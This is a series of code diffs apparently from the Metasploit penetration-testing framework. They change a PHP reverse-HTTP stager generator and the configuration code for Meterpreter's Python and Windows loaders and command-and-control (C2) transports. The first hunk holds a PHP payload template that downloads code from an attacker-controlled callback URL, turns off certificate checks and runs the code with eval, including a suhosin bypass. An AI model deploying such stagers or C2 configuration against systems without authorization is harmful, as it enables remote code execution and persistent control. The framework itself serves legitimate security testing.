+    target_url << ':'
+    target_url << opts[:port].to_s
+    target_url << luri
+    target_url << generate_callback_uri(opts)
+    target_url
+  end
+
+  #
+  # Return the longest URI that fits into our available space
+  #
+  def generate_callback_uri(opts = {})
+    uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
+
+    if self.available_space.nil? || dynamic_size? || required_space > self.available_space
+      uri_req_len = 30
+    end
+
+    uuid = generate_payload_uuid(arch: ARCH_PHP, platform: 'php')
+    generate_uri_uuid_mode(opts[:uri_uuid_mode] || :init_php, uri_req_len, uuid: uuid)
+  end
+
+  def generate_reverse_http(opts = {})
+    ds = opts[:datastore] || datastore
+    opts.merge!({
+      host: ds['LHOST'] || '127.127.127.127',
+      port: ds['LPORT'],
+    })
+
+    callback_url = generate_callback_url(opts)
+    scheme = opts[:scheme]
+
+    php = %Q^/*<?php /**/
+error_reporting(0);
+$url = '#{callback_url}';
+$opts = array('#{scheme}' => array(
+  'method' => 'GET',
+  'timeout' => 30,
+  'header' => "User-Agent: #{ds['HttpUserAgent'] || 'Mozilla/5.0'}\\r\\n",
+  'ignore_errors' => true,
+));
+^
+
+    if scheme == 'https'
+      php << %Q^$opts['ssl'] = array(
+  'verify_peer' => false,
+  'verify_peer_name' => false,
+  'allow_self_signed' => true,
+);
+^
+    end
+
+    proxy_host = ds['HttpProxyHost']
+    if proxy_host.to_s != ''
+      proxy_port = ds['HttpProxyPort'] || 8080
+      php << %Q^$opts['#{scheme}']['proxy'] = 'tcp://#{proxy_host}:#{proxy_port}';
+$opts['#{scheme}']['request_fulluri'] = true;
+^
+    end
+
+    php << %Q^$ctx = stream_context_create($opts);
+$b = file_get_contents($url, false, $ctx);
+if ($b === false) { die(); }
+if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval'))
+{
+  $suhosin_bypass = create_function('', $b);
+  $suhosin_bypass();
+}
+else
+{
+  eval($b);
+}
+die();^
+
+    php.gsub!(/#.*$/, '')
+    Rex::Text.compress(php)
+  end
+
+  def transport_config(opts = {})
+    transport_config_reverse_http(opts)
+  end
+
+  #
+  # Determine the maximum amount of space required for the features requested
+  #
+  def required_space
+    space = cached_size
+    space += 100
+    space += 256
+    space
+  end
+end
+
+end

--- a/lib/msf/core/payload/python/meterpreter_loader.rb
+++ b/lib/msf/core/payload/python/meterpreter_loader.rb
@@ -49,6 +49,35 @@ module Payload::Python::MeterpreterLoader
     Rex::Text.encode_base64(Rex::Text.zlib_deflate(stage_meterpreter(opts)))
   end
 
+  def generate_config(opts={})
+    ds = opts[:datastore] || datastore
+    opts[:uuid] ||= generate_payload_uuid(arch: ARCH_PYTHON, platform: 'python')
+
+    unless opts[:transport_config]
+      scheme = opts[:scheme] || 'tcp'
+      if scheme == 'https'
+        opts[:transport_config] = [transport_config_reverse_https(opts)]
+      elsif scheme == 'http'
+        opts[:transport_config] = [transport_config_reverse_http(opts)]
+      else
+        opts[:transport_config] = [transport_config_reverse_tcp(opts)]
+      end
+    end
+
+    config_opts = {
+      ascii_str:            true,
+      include_comms_handle: false,
+      null_session_guid:    opts[:stageless] == true,
+      expiration:           (ds[:expiration] || ds['SessionExpirationTimeout']).to_i,
+      uuid:                 opts[:uuid],
+      transports:           opts[:transport_config],
+      stageless:            opts[:stageless] == true,
+    }.merge(meterpreter_logging_config(opts))
+
+    config = Rex::Payloads::Meterpreter::Config.new(config_opts)
+    config.to_b
+  end
+
   # Get the raw Python Meterpreter stage and patch in values based on the
   # configuration
   #
@@ -86,58 +115,74 @@ module Payload::Python::MeterpreterLoader
 
     met.sub!("# PATCH-SETUP-ENCRYPTION #", python_encryptor_loader)
 
-    met.sub!('SESSION_EXPIRATION_TIMEOUT = 604800', "SESSION_EXPIRATION_TIMEOUT = #{ds['SessionExpirationTimeout']}")
-    met.sub!('SESSION_COMMUNICATION_TIMEOUT = 300', "SESSION_COMMUNICATION_TIMEOUT = #{ds['SessionCommunicationTimeout']}")
-    met.sub!('SESSION_RETRY_TOTAL = 3600', "SESSION_RETRY_TOTAL = #{ds['SessionRetryTotal']}")
-    met.sub!('SESSION_RETRY_WAIT = 10', "SESSION_RETRY_WAIT = #{ds['SessionRetryWait']}")
+    if opts[:c2_profile]
+      # When a C2 profile is specified, generate a TLV config block that
+      # contains the full transport configuration including the profile.
+      unless opts[:url].to_s == ''
+        opts[:scheme] ||= opts[:url].to_s.split(':')[0]
 
-    uuid = opts[:uuid] || generate_payload_uuid(arch: ARCH_PYTHON, platform: 'python')
-    uuid = Rex::Text.to_hex(uuid.to_raw, prefix = '')
-    met.sub!("PAYLOAD_UUID = \'\'", "PAYLOAD_UUID = \'#{uuid}\'")
+        # Build a URI from the callback URL for transport config
+        uri = "/#{opts[:url].split('/').reject(&:empty?)[-1]}"
+        opts[:uri] = "#{luri}#{uri}"
+      end
 
-    if opts[:stageless] == true
-      session_guid = '00' * 16
+      config_block = Rex::Text.encode_base64(generate_config(opts))
+      met.sub!("CONFIG_BLOCK = ''", "CONFIG_BLOCK = '#{config_block}'")
     else
-      session_guid = SecureRandom.uuid.gsub('-', '')
-    end
-    met.sub!("SESSION_GUID = \'\'", "SESSION_GUID = \'#{session_guid}\'")
+      # No C2 profile means we do what we used to do and patch the other globals.
+      met.sub!('SESSION_EXPIRATION_TIMEOUT = 604800', "SESSION_EXPIRATION_TIMEOUT = #{ds['SessionExpirationTimeout']}")
+      met.sub!('SESSION_COMMUNICATION_TIMEOUT = 300', "SESSION_COMMUNICATION_TIMEOUT = #{ds['SessionCommunicationTimeout']}")
+      met.sub!('SESSION_RETRY_TOTAL = 3600', "SESSION_RETRY_TOTAL = #{ds['SessionRetryTotal']}")
+      met.sub!('SESSION_RETRY_WAIT = 10', "SESSION_RETRY_WAIT = #{ds['SessionRetryWait']}")
 
-    http_user_agent = opts[:http_user_agent] || ds['HttpUserAgent']
-    http_proxy_host = opts[:http_proxy_host] || ds['HttpProxyHost'] || ds['PROXYHOST']
-    http_proxy_port = opts[:http_proxy_port] || ds['HttpProxyPort'] || ds['PROXYPORT']
-    http_proxy_user = opts[:http_proxy_user] || ds['HttpProxyUser']
-    http_proxy_pass = opts[:http_proxy_pass] || ds['HttpProxyPass']
-    http_header_host = opts[:header_host] || ds['HttpHostHeader']
-    http_header_cookie = opts[:header_cookie] || ds['HttpCookie']
-    http_header_referer = opts[:header_referer] || ds['HttpReferer']
+      uuid = opts[:uuid] || generate_payload_uuid(arch: ARCH_PYTHON, platform: 'python')
+      uuid = Rex::Text.to_hex(uuid.to_raw, prefix = '')
+      met.sub!("PAYLOAD_UUID = \'\'", "PAYLOAD_UUID = \'#{uuid}\'")
 
-    # The callback URL can be different to the one that we're receiving from the interface
-    # so we need to generate it
-    # TODO: move this to somewhere more common so that it can be used across payload types
-    unless opts[:url].to_s == ''
+      if opts[:stageless] == true
+        session_guid = '00' * 16
+      else
+        session_guid = SecureRandom.uuid.gsub('-', '')
+      end
+      met.sub!("SESSION_GUID = \'\'", "SESSION_GUID = \'#{session_guid}\'")
 
-      # Build the callback URL (TODO: share this logic with TransportConfig
-      uri = "/#{opts[:url].split('/').reject(&:empty?)[-1]}"
-      opts[:scheme] ||= opts[:url].to_s.split(':')[0]
-      scheme, lhost, lport = transport_uri_components(opts)
-      callback_url = "#{scheme}://#{lhost}:#{lport}#{luri}#{uri}/"
+      http_user_agent = opts[:http_user_agent] || ds['HttpUserAgent']
+      http_proxy_host = opts[:http_proxy_host] || ds['HttpProxyHost'] || ds['PROXYHOST']
+      http_proxy_port = opts[:http_proxy_port] || ds['HttpProxyPort'] || ds['PROXYPORT']
+      http_proxy_user = opts[:http_proxy_user] || ds['HttpProxyUser']
+      http_proxy_pass = opts[:http_proxy_pass] || ds['HttpProxyPass']
+      http_header_host = opts[:header_host] || ds['HttpHostHeader']
+      http_header_cookie = opts[:header_cookie] || ds['HttpCookie']
+      http_header_referer = opts[:header_referer] || ds['HttpReferer']
 
-      # patch in the various payload related configuration
-      met.sub!('HTTP_CONNECTION_URL = None', "HTTP_CONNECTION_URL = '#{var_escape.call(callback_url)}'")
-      met.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(http_user_agent)}'") if http_user_agent.to_s != ''
-      met.sub!('HTTP_COOKIE = None', "HTTP_COOKIE = '#{var_escape.call(http_header_cookie)}'") if http_header_cookie.to_s != ''
-      met.sub!('HTTP_HOST = None', "HTTP_HOST = '#{var_escape.call(http_header_host)}'") if http_header_host.to_s != ''
-      met.sub!('HTTP_REFERER = None', "HTTP_REFERER = '#{var_escape.call(http_header_referer)}'") if http_header_referer.to_s != ''
+      # The callback URL can be different to the one that we're receiving from the interface
+      # so we need to generate it
+      # TODO: move this to somewhere more common so that it can be used across payload types
+      unless opts[:url].to_s == ''
 
-      if http_proxy_host.to_s != ''
-        http_proxy_url = "http://"
-        unless http_proxy_user.to_s == '' && http_proxy_pass.to_s == ''
-          http_proxy_url << "#{Rex::Text.uri_encode(http_proxy_user)}:#{Rex::Text.uri_encode(http_proxy_pass)}@"
+        # Build the callback URL (TODO: share this logic with TransportConfig
+        uri = "/#{opts[:url].split('/').reject(&:empty?)[-1]}"
+        opts[:scheme] ||= opts[:url].to_s.split(':')[0]
+        scheme, lhost, lport = transport_uri_components(opts)
+        callback_url = "#{scheme}://#{lhost}:#{lport}#{luri}#{uri}/"
+
+        # patch in the various payload related configuration
+        met.sub!('HTTP_CONNECTION_URL = None', "HTTP_CONNECTION_URL = '#{var_escape.call(callback_url)}'")
+        met.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(http_user_agent)}'") if http_user_agent.to_s != ''
+        met.sub!('HTTP_COOKIE = None', "HTTP_COOKIE = '#{var_escape.call(http_header_cookie)}'") if http_header_cookie.to_s != ''
+        met.sub!('HTTP_HOST = None', "HTTP_HOST = '#{var_escape.call(http_header_host)}'") if http_header_host.to_s != ''
+        met.sub!('HTTP_REFERER = None', "HTTP_REFERER = '#{var_escape.call(http_header_referer)}'") if http_header_referer.to_s != ''
+
+        if http_proxy_host.to_s != ''
+          http_proxy_url = "http://"
+          unless http_proxy_user.to_s == '' && http_proxy_pass.to_s == ''
+            http_proxy_url << "#{Rex::Text.uri_encode(http_proxy_user)}:#{Rex::Text.uri_encode(http_proxy_pass)}@"
+          end
+          http_proxy_url << (Rex::Socket.is_ipv6?(http_proxy_host) ? "[#{http_proxy_host}]" : http_proxy_host)
+          http_proxy_url << ":#{http_proxy_port}"
+
+          met.sub!('HTTP_PROXY = None', "HTTP_PROXY = '#{var_escape.call(http_proxy_url)}'")
         end
-        http_proxy_url << (Rex::Socket.is_ipv6?(http_proxy_host) ? "[#{http_proxy_host}]" : http_proxy_host)
-        http_proxy_url << ":#{http_proxy_port}"
-
-        met.sub!('HTTP_PROXY = None', "HTTP_PROXY = '#{var_escape.call(http_proxy_url)}'")
       end
     end
 

--- a/lib/msf/core/payload/python/meterpreter_loader.rb
+++ b/lib/msf/core/payload/python/meterpreter_loader.rb
@@ -66,7 +66,6 @@ module Payload::Python::MeterpreterLoader
 
     config_opts = {
       ascii_str:            true,
-      include_comms_handle: false,
       null_session_guid:    opts[:stageless] == true,
       expiration:           (ds[:expiration] || ds['SessionExpirationTimeout']).to_i,
       uuid:                 opts[:uuid],
@@ -80,34 +79,9 @@ module Payload::Python::MeterpreterLoader
 
   # Get the raw Python Meterpreter stage and patch in values based on the
   # configuration
-  #
-  # @param opts [Hash] The options to use for patching the stage data.
-  # @option opts [String] :http_proxy_host The host to use as a proxy for
-  #   HTTP(S) transports.
-  # @option opts [String] :http_proxy_port The port to use when a proxy  host is
-  #   set for HTTP(S) transports.
-  # @option opts [String] :url The HTTP(S) URL to patch in to
-  #   allow use of the stage as a stageless payload.
-  # @option opts [String] :http_user_agent The value to use for the User-Agent
-  #   header for HTTP(S) transports.
-  # @option opts [String] :stageless_tcp_socket_setup Python code to execute to
-  #   setup a tcp socket to allow use of the stage as a stageless payload.
-  # @option opts [String] :uuid A specific UUID to use for sessions created by
-  #   this stage.
   def stage_meterpreter(opts={})
     ds = opts[:datastore] || datastore
     met = MetasploitPayloads.read('meterpreter', 'meterpreter.py')
-
-    var_escape = lambda { |txt|
-      txt.gsub('\\', '\\' * 8).gsub('\'', %q(\\\\\\\'))
-    }
-
-    if ds['MeterpreterDebugBuild']
-      met.sub!(%q|DEBUGGING = False|, %q|DEBUGGING = True|)
-
-      logging_options = Msf::OptMeterpreterDebugLogging.parse_logging_options(ds['MeterpreterDebugLogging'])
-      met.sub!(%q|DEBUGGING_LOG_FILE_PATH = None|, %Q|DEBUGGING_LOG_FILE_PATH = "#{logging_options[:rpath]}"|) if logging_options[:rpath]
-    end
 
     unless ds['MeterpreterTryToFork']
       met.sub!('TRY_TO_FORK = True', 'TRY_TO_FORK = False')
@@ -115,76 +89,16 @@ module Payload::Python::MeterpreterLoader
 
     met.sub!("# PATCH-SETUP-ENCRYPTION #", python_encryptor_loader)
 
-    if opts[:c2_profile]
-      # When a C2 profile is specified, generate a TLV config block that
-      # contains the full transport configuration including the profile.
-      unless opts[:url].to_s == ''
-        opts[:scheme] ||= opts[:url].to_s.split(':')[0]
-
-        # Build a URI from the callback URL for transport config
-        uri = "/#{opts[:url].split('/').reject(&:empty?)[-1]}"
-        opts[:uri] = "#{luri}#{uri}"
-      end
-
-      config_block = Rex::Text.encode_base64(generate_config(opts))
-      met.sub!("CONFIG_BLOCK = ''", "CONFIG_BLOCK = '#{config_block}'")
-    else
-      # No C2 profile means we do what we used to do and patch the other globals.
-      met.sub!('SESSION_EXPIRATION_TIMEOUT = 604800', "SESSION_EXPIRATION_TIMEOUT = #{ds['SessionExpirationTimeout']}")
-      met.sub!('SESSION_COMMUNICATION_TIMEOUT = 300', "SESSION_COMMUNICATION_TIMEOUT = #{ds['SessionCommunicationTimeout']}")
-      met.sub!('SESSION_RETRY_TOTAL = 3600', "SESSION_RETRY_TOTAL = #{ds['SessionRetryTotal']}")
-      met.sub!('SESSION_RETRY_WAIT = 10', "SESSION_RETRY_WAIT = #{ds['SessionRetryWait']}")
-
-      uuid = opts[:uuid] || generate_payload_uuid(arch: ARCH_PYTHON, platform: 'python')
-      uuid = Rex::Text.to_hex(uuid.to_raw, prefix = '')
-      met.sub!("PAYLOAD_UUID = \'\'", "PAYLOAD_UUID = \'#{uuid}\'")
-
-      if opts[:stageless] == true
-        session_guid = '00' * 16
-      else
-        session_guid = SecureRandom.uuid.gsub('-', '')
-      end
-      met.sub!("SESSION_GUID = \'\'", "SESSION_GUID = \'#{session_guid}\'")
-
-      http_user_agent = opts[:http_user_agent] || ds['HttpUserAgent']
-      http_proxy_host = opts[:http_proxy_host] || ds['HttpProxyHost'] || ds['PROXYHOST']
-      http_proxy_port = opts[:http_proxy_port] || ds['HttpProxyPort'] || ds['PROXYPORT']
-      http_proxy_user = opts[:http_proxy_user] || ds['HttpProxyUser']
-      http_proxy_pass = opts[:http_proxy_pass] || ds['HttpProxyPass']
-      http_header_host = opts[:header_host] || ds['HttpHostHeader']
-      http_header_cookie = opts[:header_cookie] || ds['HttpCookie']
-      http_header_referer = opts[:header_referer] || ds['HttpReferer']
-
-      # The callback URL can be different to the one that we're receiving from the interface
-      # so we need to generate it
-      # TODO: move this to somewhere more common so that it can be used across payload types
-      unless opts[:url].to_s == ''
-
-        # Build the callback URL (TODO: share this logic with TransportConfig
-        uri = "/#{opts[:url].split('/').reject(&:empty?)[-1]}"
-        opts[:scheme] ||= opts[:url].to_s.split(':')[0]
-        scheme, lhost, lport = transport_uri_components(opts)
-        callback_url = "#{scheme}://#{lhost}:#{lport}#{luri}#{uri}/"
-
-        # patch in the various payload related configuration
-        met.sub!('HTTP_CONNECTION_URL = None', "HTTP_CONNECTION_URL = '#{var_escape.call(callback_url)}'")
-        met.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(http_user_agent)}'") if http_user_agent.to_s != ''
-        met.sub!('HTTP_COOKIE = None', "HTTP_COOKIE = '#{var_escape.call(http_header_cookie)}'") if http_header_cookie.to_s != ''
-        met.sub!('HTTP_HOST = None', "HTTP_HOST = '#{var_escape.call(http_header_host)}'") if http_header_host.to_s != ''
-        met.sub!('HTTP_REFERER = None', "HTTP_REFERER = '#{var_escape.call(http_header_referer)}'") if http_header_referer.to_s != ''
-
-        if http_proxy_host.to_s != ''
-          http_proxy_url = "http://"
-          unless http_proxy_user.to_s == '' && http_proxy_pass.to_s == ''
-            http_proxy_url << "#{Rex::Text.uri_encode(http_proxy_user)}:#{Rex::Text.uri_encode(http_proxy_pass)}@"
-          end
-          http_proxy_url << (Rex::Socket.is_ipv6?(http_proxy_host) ? "[#{http_proxy_host}]" : http_proxy_host)
-          http_proxy_url << ":#{http_proxy_port}"
-
-          met.sub!('HTTP_PROXY = None', "HTTP_PROXY = '#{var_escape.call(http_proxy_url)}'")
-        end
-      end
+    # Build the URI from the callback URL if present
+    unless opts[:url].to_s == ''
+      opts[:scheme] ||= opts[:url].to_s.split(':')[0]
+      uri = "/#{opts[:url].split('/').reject(&:empty?)[-1]}"
+      opts[:uri] = "#{luri}#{uri}"
     end
+
+    # Generate the TLV config block containing all transport configuration
+    config_block = Rex::Text.encode_base64(generate_config(opts))
+    met.sub!("CONFIG_BLOCK = ''", "CONFIG_BLOCK = '#{config_block}'")
 
     # patch in any optional stageless tcp socket setup
     unless opts[:stageless_tcp_socket_setup].nil?

--- a/lib/msf/core/payload/python/meterpreter_loader.rb
+++ b/lib/msf/core/payload/python/meterpreter_loader.rb
@@ -70,6 +70,8 @@ module Payload::Python::MeterpreterLoader
       expiration:           (ds[:expiration] || ds['SessionExpirationTimeout']).to_i,
       uuid:                 opts[:uuid],
       transports:           opts[:transport_config],
+      extensions:           opts[:extensions] || [],
+      ext_format:           'py',
       stageless:            opts[:stageless] == true,
     }.merge(meterpreter_logging_config(opts))
 

--- a/lib/msf/core/payload/windows/meterpreter_loader.rb
+++ b/lib/msf/core/payload/windows/meterpreter_loader.rb
@@ -86,8 +86,9 @@ module Payload::Windows::MeterpreterLoader
     # create the configuration instance based off the parameters
     config = Rex::Payloads::Meterpreter::Config.new(config_opts)
 
-    # return the binary version of it
-    config.to_b
+    # return the binary version of it, prefixed with an 8-byte comms handle
+    # that the stager patches with the active socket/handle
+    "\x00" * 8 + config.to_b
   end
 
   def stage_meterpreter(opts={})

--- a/lib/msf/core/payload/windows/meterpreter_loader.rb
+++ b/lib/msf/core/payload/windows/meterpreter_loader.rb
@@ -81,6 +81,7 @@ module Payload::Windows::MeterpreterLoader
       uuid:              opts[:uuid],
       transports:        opts[:transport_config] || [transport_config(opts)],
       extensions:        [],
+      ext_format:        'x86.dll',
       stageless:         opts[:stageless] == true,
     }.merge(meterpreter_logging_config(opts))
     # create the configuration instance based off the parameters

--- a/lib/msf/core/payload/windows/x64/meterpreter_loader_x64.rb
+++ b/lib/msf/core/payload/windows/x64/meterpreter_loader_x64.rb
@@ -90,8 +90,9 @@ module Payload::Windows::MeterpreterLoader_x64
     # create the configuration instance based off the parameters
     config = Rex::Payloads::Meterpreter::Config.new(config_opts)
 
-    # return the binary version of it
-    config.to_b
+    # return the binary version of it, prefixed with an 8-byte comms handle
+    # that the stager patches with the active socket/handle
+    "\x00" * 8 + config.to_b
   end
 
   def stage_meterpreter(opts={})

--- a/lib/msf/core/payload/windows/x64/meterpreter_loader_x64.rb
+++ b/lib/msf/core/payload/windows/x64/meterpreter_loader_x64.rb
@@ -84,6 +84,7 @@ module Payload::Windows::MeterpreterLoader_x64
       uuid:              opts[:uuid],
       transports:        opts[:transport_config] || [transport_config(opts)],
       extensions:        [],
+      ext_format:        'x64.dll',
       stageless:         opts[:stageless] == true,
     }.merge(meterpreter_logging_config(opts))
 

--- a/lib/rex/payloads/meterpreter/config.rb
+++ b/lib/rex/payloads/meterpreter/config.rb
@@ -167,13 +167,6 @@ private
       add_extension_tlv(config_packet, e, ext_inits[e], file_extension, debug_build: @opts[:debug_build])
     end
 
-    config_bytes = config_packet.to_r
-
-    if @opts[:include_comms_handle] == false
-      config_bytes
-    else
-      # comms handle needs to have space added, as this is where things are patched by the stager
-      "\x00" * 8 + config_bytes
-    end
+    config_packet.to_r
   end
 end

--- a/lib/rex/payloads/meterpreter/config.rb
+++ b/lib/rex/payloads/meterpreter/config.rb
@@ -67,6 +67,10 @@ private
     if opts[:debug_build] && opts[:log_path]
       tlv.add_tlv(MET::TLV_TYPE_DEBUG_LOG, opts[:log_path])
     end
+
+    if opts[:flags] && opts[:flags] != 0
+      tlv.add_tlv(MET::TLV_TYPE_SESSION_FLAGS, opts[:flags])
+    end
   end
 
   def add_c2_tlv(tlv, opts)

--- a/lib/rex/payloads/meterpreter/config.rb
+++ b/lib/rex/payloads/meterpreter/config.rb
@@ -116,7 +116,11 @@ private
       c2_tlv.add_tlv(MET::TLV_TYPE_C2_PROXY_PASS, opts[:proxy_pass]) unless (opts[:proxy_pass] || '').empty?
 
       c2_tlv.add_tlv(MET::TLV_TYPE_C2_CERT_HASH, opts[:ssl_cert_hash]) unless (opts[:ssl_cert_hash] || '').empty?
-      c2_tlv.add_tlv(MET::TLV_TYPE_C2_HEADER, opts[:custom_headers]) unless (opts[:custom_headers] || '').empty?
+      c2_tlv.add_tlv(MET::TLV_TYPE_C2_HEADERS, opts[:custom_headers]) unless (opts[:custom_headers] || '').empty?
+
+      # Per-transport UUID for C2 profile placement (uuid_get/header/cookie).
+      # Payloads fall back to URL-path extraction when this TLV is absent.
+      c2_tlv.add_tlv(MET::TLV_TYPE_C2_UUID, @opts[:uuid].to_s) if @opts[:uuid]
     end
 
     tlv.tlvs << c2_tlv

--- a/lib/rex/payloads/meterpreter/config.rb
+++ b/lib/rex/payloads/meterpreter/config.rb
@@ -76,8 +76,6 @@ private
   end
 
   def add_c2_tlv(tlv, opts)
-    # Build the URL from the given parameters, and pad it out to the
-    # correct size
     lhost = opts[:lhost]
     if lhost && opts[:scheme].start_with?('http') && Rex::Socket.is_ipv6?(lhost)
       lhost = "[#{lhost}]"

--- a/lib/rex/payloads/meterpreter/config.rb
+++ b/lib/rex/payloads/meterpreter/config.rb
@@ -59,7 +59,7 @@ private
       session_guid = [SecureRandom.uuid.gsub('-', '')].pack('H*')
     end
 
-    tlv.add_tlv(MET::TLV_TYPE_EXITFUNC, exit_func)
+    tlv.add_tlv(MET::TLV_TYPE_EXITFUNC, exit_func) if exit_func
     tlv.add_tlv(MET::TLV_TYPE_SESSION_EXPIRY, opts[:expiration])
     tlv.add_tlv(MET::TLV_TYPE_UUID, uuid)
     tlv.add_tlv(MET::TLV_TYPE_SESSION_GUID, session_guid)
@@ -167,10 +167,13 @@ private
       add_extension_tlv(config_packet, e, ext_inits[e], file_extension, debug_build: @opts[:debug_build])
     end
 
-    # comms handle needs to have space added, as this is where things are patched by the stager
-    comms_handle = "\x00" * 8
     config_bytes = config_packet.to_r
 
-    comms_handle + config_bytes
+    if @opts[:include_comms_handle] == false
+      config_bytes
+    else
+      # comms handle needs to have space added, as this is where things are patched by the stager
+      "\x00" * 8 + config_bytes
+    end
   end
 end

--- a/lib/rex/payloads/meterpreter/config.rb
+++ b/lib/rex/payloads/meterpreter/config.rb
@@ -129,8 +129,15 @@ private
 
   def add_extension_tlv(tlv, ext_name, ext_init_path, file_extension, debug_build: false)
     ext_name = ext_name.strip.downcase
-    ext, _ = load_rdi_dll(MetasploitPayloads.meterpreter_path("ext_server_#{ext_name}",
-                                                              file_extension, debug: debug_build))
+    # Windows DLLs go through Reflective DLL Injection prep; non-PE
+    # runtimes (jar/py/php) ship the file as-is in TLV_TYPE_DATA.
+    if file_extension.to_s.end_with?('.dll')
+      ext_path = MetasploitPayloads.meterpreter_path("ext_server_#{ext_name}",
+                                                     file_extension, debug: debug_build)
+      ext, _ = load_rdi_dll(ext_path)
+    else
+      ext = MetasploitPayloads.read('meterpreter', "ext_server_#{ext_name}.#{file_extension}".downcase)
+    end
 
     ext_tlv = MET::GroupTlv.new(MET::TLV_TYPE_EXTENSION)
     ext_tlv.add_tlv(MET::TLV_TYPE_DATA, ext)
@@ -153,10 +160,10 @@ private
       add_c2_tlv(config_packet, t)
     end
 
-    # configure the extensions - this will have to change when posix comes
-    # into play.
-    file_extension = 'x86.dll'
-    file_extension = 'x64.dll' unless is_x86?
+    # Each runtime tells us which on-disk extension file matches the
+    # payload (e.g. 'x86.dll', 'x64.dll', 'py', 'php', 'jar'); skip the
+    # extension TLV emission when the caller didn't supply one.
+    file_extension = @opts[:ext_format]
 
     @opts[:extensions] = [] if @opts[:extensions].blank?
     prev_length = @opts[:extensions].length
@@ -172,8 +179,10 @@ private
 
     ext_inits = (@opts[:ext_init] || '').split(':').map{|v| v.split(',')}.to_h{|l| l}
 
-    (@opts[:extensions] || []).each do |e|
-      add_extension_tlv(config_packet, e, ext_inits[e], file_extension, debug_build: @opts[:debug_build])
+    if file_extension
+      (@opts[:extensions] || []).each do |e|
+        add_extension_tlv(config_packet, e, ext_inits[e], file_extension, debug_build: @opts[:debug_build])
+      end
     end
 
     config_packet.to_r

--- a/lib/rex/payloads/meterpreter/config.rb
+++ b/lib/rex/payloads/meterpreter/config.rb
@@ -3,12 +3,14 @@ require 'rex/socket/x509_certificate'
 require 'rex/post/meterpreter/extension_mapper'
 require 'rex/post/meterpreter/packet'
 require 'msf/core/payload/malleable_c2'
+require 'rex/payloads/meterpreter/uri_checksum'
 require 'securerandom'
 
 class Rex::Payloads::Meterpreter::Config
 
   include Msf::Payload::UUID::Options
   include Msf::ReflectiveDLLLoader
+  include Rex::Payloads::Meterpreter::UriChecksum
 
   MET = Rex::Post::Meterpreter
 
@@ -95,32 +97,43 @@ private
     c2_tlv.add_tlv(MET::TLV_TYPE_C2_RETRY_TOTAL, opts[:retry_total])
     c2_tlv.add_tlv(MET::TLV_TYPE_C2_RETRY_WAIT, opts[:retry_wait])
 
-    url = "#{opts[:scheme]}://#{Rex::Socket.to_authority(lhost, opts[:lport])}"
-    url << "/#{opts[:uri].delete_prefix('/').delete_suffix('/')}/" if opts[:uri]
-    url << "?#{opts[:scope_id]}" if opts[:scope_id]
+    # Only build a C2 URL when we actually have a host. Staged payloads
+    # inherit the stager's socket and carry no host; guard so a nil lhost
+    # cannot reach Rex::Socket.to_authority (which requires a String).
+    if lhost && !lhost.to_s.empty?
+      url = "#{opts[:scheme]}://#{Rex::Socket.to_authority(lhost, opts[:lport])}"
+      url << "/#{opts[:uri].delete_prefix('/').delete_suffix('/')}/" if opts[:uri]
+      url << "?#{opts[:scope_id]}" if opts[:scope_id]
 
-    c2_tlv.add_tlv(MET::TLV_TYPE_C2_URL, url)
+      c2_tlv.add_tlv(MET::TLV_TYPE_C2_URL, url)
 
-    # if the transport URI is for a HTTP payload we need to add a stack
-    # of other stuff that can only be set in MSF, not in the C2 profile
-    if url.start_with?('http')
-      proxy_url = ''
-      if opts[:proxy_host] && opts[:proxy_port]
-        prefix = 'http://'
-        prefix = 'socks=' if opts[:proxy_type].to_s.downcase == 'socks'
-        proxy_url = "#{prefix}#{opts[:proxy_host]}:#{opts[:proxy_port]}"
+      # if the transport URI is for a HTTP payload we need to add a stack
+      # of other stuff that can only be set in MSF, not in the C2 profile
+      if url.start_with?('http')
+        proxy_url = ''
+        if opts[:proxy_host] && opts[:proxy_port]
+          prefix = 'http://'
+          prefix = 'socks=' if opts[:proxy_type].to_s.downcase == 'socks'
+          proxy_url = "#{prefix}#{opts[:proxy_host]}:#{opts[:proxy_port]}"
+        end
+
+        c2_tlv.add_tlv(MET::TLV_TYPE_C2_PROXY_URL, proxy_url) unless (proxy_url || '').empty?
+        c2_tlv.add_tlv(MET::TLV_TYPE_C2_PROXY_USER, opts[:proxy_user]) unless (opts[:proxy_user] || '').empty?
+        c2_tlv.add_tlv(MET::TLV_TYPE_C2_PROXY_PASS, opts[:proxy_pass]) unless (opts[:proxy_pass] || '').empty?
+
+        c2_tlv.add_tlv(MET::TLV_TYPE_C2_CERT_HASH, opts[:ssl_cert_hash]) unless (opts[:ssl_cert_hash] || '').empty?
+        c2_tlv.add_tlv(MET::TLV_TYPE_C2_HEADERS, opts[:custom_headers]) unless (opts[:custom_headers] || '').empty?
+
+        # Per-transport UUID for C2 profile placement (uuid_get/header/cookie).
+        # Payloads fall back to URL-path extraction when this TLV is absent.
+        # Bake a checksum-tuned :init_connect URI (>=URI_CHECKSUM_UUID_MIN_LEN,
+        # checksum8 => mode), not the bare to_uri. The handler needs the tuned
+        # form to extract both the UUID and the mode; a bare UUID yields nil.
+        if @opts[:uuid]
+          tuned = generate_uri_uuid(URI_CHECKSUM_INIT_CONN, @opts[:uuid]).sub(%r{\A/}, '')
+          c2_tlv.add_tlv(MET::TLV_TYPE_C2_UUID, tuned)
+        end
       end
-
-      c2_tlv.add_tlv(MET::TLV_TYPE_C2_PROXY_URL, proxy_url) unless (proxy_url || '').empty?
-      c2_tlv.add_tlv(MET::TLV_TYPE_C2_PROXY_USER, opts[:proxy_user]) unless (opts[:proxy_user] || '').empty?
-      c2_tlv.add_tlv(MET::TLV_TYPE_C2_PROXY_PASS, opts[:proxy_pass]) unless (opts[:proxy_pass] || '').empty?
-
-      c2_tlv.add_tlv(MET::TLV_TYPE_C2_CERT_HASH, opts[:ssl_cert_hash]) unless (opts[:ssl_cert_hash] || '').empty?
-      c2_tlv.add_tlv(MET::TLV_TYPE_C2_HEADERS, opts[:custom_headers]) unless (opts[:custom_headers] || '').empty?
-
-      # Per-transport UUID for C2 profile placement (uuid_get/header/cookie).
-      # Payloads fall back to URL-path extraction when this TLV is absent.
-      c2_tlv.add_tlv(MET::TLV_TYPE_C2_UUID, @opts[:uuid].to_s) if @opts[:uuid]
     end
 
     tlv.tlvs << c2_tlv

